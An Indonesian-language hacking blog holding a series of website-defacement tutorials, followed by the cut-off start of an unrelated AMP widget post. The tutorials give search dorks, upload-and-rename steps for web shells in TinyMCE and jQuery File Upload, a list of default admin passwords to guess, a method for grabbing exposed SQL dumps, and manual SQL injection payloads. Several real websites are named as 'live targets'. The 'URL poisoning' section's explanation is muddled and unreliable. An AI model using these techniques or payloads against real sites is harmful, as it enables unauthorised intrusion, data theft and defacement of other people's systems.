Selasa, 25 Desember 2018

Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

Sebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorial

Ok kali ini gw share deface POC TinyMce Plugins Image Manager 
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg

Ok langsung aja

DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )

Exploit : site.com/(path)/tinymce/plugins/image/upload.php

Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php

1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih


2. site yg vuln seperti ini

     Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini



3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php

4. Upload extensi shell .jpg  , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln



5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini


6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu

7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin

http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php

Ga ngerti? ok contoh seperti ini



8. kalau success muncul tulisan banyak seperti ini


9. tinggal kita akses deh
akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php




mudah bukan? eheheh
ada yang masih kurang ngerti? Jangan ragu untuk bertanya

Ok sekian..
terima kasih sudah berkunjung

Tutorial Deface Dengan Cara Admin Weak Password / Admin Poor Password

Kali ini gw share Deface Dengan Cara Admin Weak Password / Admin Poor Password
Yap, teknik / cara deface ini cukup simple ya, tapi agak susah juga cari target nya

sebenarnya gw udh dpet dri minggu kmren, cuman krna sibuk gan sama real life . jdi ga sempet nulis tutor


Ok langsung aja

DORK : inurl:admin123/login.php
              intitle:Login
              ( Selebihnya kembangin lagi dorknya wkwk ) :D


Ok yg pertama kalian harus dorking dulu ke google atau search engine lainnya :D

krna gw disini udh ada target nya, maka langsung aja menuju ke halaman login admin


Karna cara deface ini memakai teknik Admin Weak Password/ Admin Poor Password
jadi kalian coba coba aja , sebagai berikut

user : admin
password : admin

user : admin
password : sysadmin

user : admin
password : admin123

user : admin
password : 12345678

user : admin
password : adminweb

user : sysadmin
password : adminpanel

user : adminpanel
password : adminpanel

user : masterweb
password : masterweb

user : admin123
password : admin123

user : root
password : webadmin

Nah itu dia kumpulan user dan password memakai cara deface ini

Gw disini berhasil login dengan memakai

user : admin
password : sysadmin


Nah udh berhasil masuk ke halaman admin kan? nah tinggal bebas deh mau di apakan :D

Atau bertanya via instagram admin wkwkw, tapi jangan deh private :D

Oke cukup sekian gan, Terima kasih sudah berkunjung :)


Tutorial Deface Dengan Cara Jquery File Upload

Kali ini gw ingin share teknik deface Jquery File Upload 
Cara deface ini memakai CSRF ya :)

Dork = inurl:upload/server/php/
             inurl:admin/upload/server/php
       
 ( SELEBIHNYA KEMBANGKAN SENDIRI YA ) Atau chat di fanpage facebook ya di https://facebook.com/trollyoursystem

CSRF = http://trolling-system.ooo/csrf-jquery.txt ( Upload / save di web ya, ubah site.com menjadi                  url target )


Extensi shell = [ .php5 ] [ .phtml ] [ php.xxxjpg ] [ php.pjpeg ] Selebihnya sepinter pinter kalian ok

Live target, bagi yang mau mencoba nya = http://www.baba-bahaa.com/ADMIN/pages/upload/server/php/


Ok langsung ke tutorialnya

1. Cari target menggunakan dork di atas, krna gw udh pnya live target, jadi ciri ciri kalau vuln seperti ini


2. Lalu masukkan target ke dalam CSRF yang gw kasih tadi, upload shell kalian ext yang udh gw jelasin di atas. kalau berhasil di upload seperti ini



3. Sekarang kita akses shell yg udh di upload tadi
aksesnya site.com/[path]/upload/server/php/files/namashell.php

Contoh akses shell gw nih, look at picture



Ok sekian dulu ya guys, udh mlm gw jg mau main :v
y lh keluar jgn no life, biar tau kerasnya dunia luar seperti apa :)


Terima kasih sudah berkunjung

Tutorial Deface Dengan Cara Download Database SQL

Kali ini gw share tutorial deface ni gan
Deface Dengan Cara Download Database SQL

Sekilas gw jelasin

Jadi cara deface ini kita memanfaatkan dari si admin website tersebut, karena menyisipkan file database.sql nya di public_html :D
Saran gw untuk admin website lainnya, JANGAN PERNAH menyisipkan file yang penting di website, baik itu backup-an , database , user & password dll nya
Lalu sedikit saran lagi, File config dari website harus di ubah permission nya

file config berbagai macam jenis & namanya, gw jelasin nih , menurut sepengetahuan gw

CMS Wordpress = wp-config.php
CMS Joomla = configuration.php
CMS Lokomedia = Config.php

CMS nya gw gatau, tapi biasanya di
admin/models/db-settings.php
admin/includes/config.php

Nah itu dia sedikit penjelasan dari gw, ok lanjut ke topik
Yap jadi teknik deface ini bisa pakai Tools

Gw pakai tools scan directory download di http://trolling-system.blogspot.com/2018/03/bruteforce-files-directory-website.html, lalu mendapatkan sebuah ini


Yap itu adalah sebuah database website nya :D
Lalu gw cek, ternyata benar, lihat gambar



selanjutnya cari username , password admin dari website tersebut di database nya itu
gw dapat


Nah tinggal di hash passwordnya, lalu login deh ke webnya :D

gimna mudah bukan? klo kata gw sih susah wkwkw

Oke sekian gan tutorialnya :D

Tutorial Deface Dengan Cara URL Poisoning

ok kali ini saya akan share Deface Dengan Cara URL Poisoning 
Cara ini cukup mudah kok , langsung aja ya caranya :D

Sekilas gw jelasin sedikit apa itu URL Poisoning ??

URL Poisoning, juga dikenal sebagai ( Location Poisoning )
Adalah metode pelacakan perilaku pengguna Web dengan menambahkan nomor identifikasi (ID) ke alamat halaman URL (Uniform Resource Locator) baris browser Web ketika pengguna mengunjungi situs tertentu. Nomor ID ini kemudian dapat digunakan untuk menentukan halaman mana di situs yang dikunjungi pengguna sesudahnya. Menggabungkan informasi semacam ini dapat berguna untuk memahami bagaimana pengguna mendapatkan halaman, produk atau layanan apa yang mungkin mereka minati, dan menghubungkan perilaku pengguna dengan demografi. URL Poisoning menyerupai penggunaan cookie. Namun, dengan URL Poisoning, pengguna tidak memiliki cara mudah untuk memilih keluar. Server yang menggunakan URL Poisoning memberikan ID segera setelah halaman pertama situs dikunjungi. Browser Web kemudian menganggap ID ini sebagai bagian dari URL. ID tetap dan dicatat selama pengguna mengunjungi halaman lain di situs yang sama. Itu juga dapat tinggal dengan browser ketika pengguna mengunjungi situs web yang bekerja sama dengan situs asli dalam melacak urutan halaman pengguna. Karena pengguna mungkin tidak ingin siapa pun melacak halaman yang dikunjungi

Nah begitulah kira kira penjelasan singkat URL Poisoning nya :D


Sekarang kita lanjut ke tutornya, sangat mudah sekali caranya

Dork =

site:ua "j images jdownloads screenshots version php j"
site:ua "wp content uploads gravity forms index php option com jdownloads"
site:ua "plugins editors jce tiny mce plugins cfg contactform"
site:ua "cfg contactform"


Pertama kalian paste dork di atas ke search engine ( google )



ok kalian pilih salah satu website
sebagai contoh, gw ambil website yg urutan pertama muncul di google


Lalu buka, maka akan muncul tulisan berantakan seperti ini



Tinggal hapus semua semuanya, kecuali domain
contoh

website ini http://colesa.com.ua/wp-content/uploads/gravity_forms/index.php%3Foption%3Dcom_jdownloads%26Itemid%3D0%26view%3Dupload?sa=U&ved=0ahUKEwjU8MGIkPXPAhXLCiwKHVkYDGUQFgiQAzBV&usg=AFQjCNEewS94LeOvgtPPs1hWzS2WAUWNCA//media/system/index.php

Ubah jadi seperti ini, ( Ubah hacker indonesia jadi nick lo )

http://colesa.com.ua/hacked-by-hacker-indonesia

maka hasilnya



Berhasil kan? wkwk gampang ya cara nya :D

Cara deface ini gw dapat dari cxsecurity, linknya >> : https://cxsecurity.com/ascii/WLB-2018070069

Ok sekian gan tutorialnya :D

Tutorial Deface Dengan Cara SQL Injection Manual

kembali lagi bersama gue admin yg ganteng :v
Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwk

kali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manual
beberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manual

langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'



3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI



4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -


6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -


7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya


User : u2232528_garudatrans@localhost
Database : u2232528_garuda
Version : 10.2.17-MariaDB

Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D

Ok sekian...
Terimaasih sudah berkunjung

Minggu, 23 Desember 2018

Widget Recent Post Untuk AMP Dengan Next Prev



Widget Recent Post Untuk AMP Dengan Next Prev yang dimaksud adalah seperti pada demo berikut:







Demo

Untuk menyimpan widget recent post ini di sidebar blog AMP, silahkan copy kode berikut ini dan simpan di antara widget di sidebar melalui EDIT HTML.


         
           
              <

Update Template Premium Kompi Flexible Non AMP v8

Seperti kita ketahui bahwa kini kecepatan loading blog atau skor "hijau" pagespeed insight dijadikan faktor rangking di zaman inde...